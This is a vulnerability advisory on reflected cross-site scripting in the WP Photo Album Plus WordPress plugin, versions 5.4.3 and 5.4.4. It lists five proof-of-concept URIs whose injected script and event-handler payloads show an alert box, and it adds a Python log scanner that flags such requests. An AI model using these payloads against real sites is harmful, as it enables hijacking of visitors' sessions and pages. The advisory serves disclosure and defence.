WordPress Photo Album Plus Plugin Multiple Cross Site Scripting Vulnerabilities
BID:69786
Info
| Bugtraq ID: | 69786 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2014 12:00AM |
| Updated: | Sep 12 2014 12:00AM |
| Credit: | Milhouse |
| Vulnerable: | WordPress WP Photo Album Plus 5.4.4; WordPress WP Photo Album Plus 5.4.3 |
| Not Vulnerable: | |
Exploit / POC
To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/?page_id=109&wppa-album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa-occur=1&wppa-tag=
http://www.example.com/?wppa-occur=1&wppa-lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa-album=0&wppa-photo=2
http://www.example.com/?page_id=110&wppa-search-submit=wppa-search-submit%3dSearch&wppa-searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3b512b44ea8&wppa-searchroot=
http://www.example.com/?wppa-occur=1&wppa-topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa-album=0&wppa-photo=2
http://www.example.com/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert(1)"3924b
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
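With no vendor patch listed, one interim check is to review web access logs for requests in which the parameters named in the example URIs carry HTML metacharacters after URL decoding. The following is an added example, not part of the original advisory or the plugin's code; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameters that appear with injected markup in the advisory's example URIs.
WATCHED = {"wppa-album", "wppa-lasten", "wppa-searchstring", "wppa-topten", "s"}
# Characters that let a reflected value break out of an HTML attribute or element.
META = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Sep/2014:10:00:00 +0000] "GET /?page_id=12&wppa-album=0&wppa-photo=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Sep/2014:10:00:05 +0000] "GET /?page_id=109&wppa-album=0%3C%2Fscript%3E&wppa-cover=0 HTTP/1.1" 200 5300',
    '203.0.113.9 - - [12/Sep/2014:10:00:09 +0000] "GET /?wppa-occur=1&wppa-topten=10%2522x&&page_id=12 HTTP/1.1" 200 5290',
    '203.0.113.7 - - [12/Sep/2014:10:00:12 +0000] "GET /?s=holiday+photos HTTP/1.1" 200 4100',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded values such as %2522 are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(uri):
    """Return the sorted names of watched parameters whose decoded value contains HTML metacharacters."""
    hits = set()
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name.lower() in WATCHED and META.search(decode_fully(value)):
            hits.add(name.lower())
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, uri, parameter_names) for each log line with a suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        params = suspicious_params(match.group(1)) if match else []
        if params:
            findings.append((number, match.group(1), params))
    return findings

if __name__ == "__main__":
    for number, uri, params in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(params)} in {uri}")
```

A legitimate search term containing an apostrophe or quote is also flagged through the `s` parameter, so hits on `s` need manual review.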
References
References:
- WordPress HomePage (WordPress)
- WP Photo Album Plus Plugin Homepage (WordPress)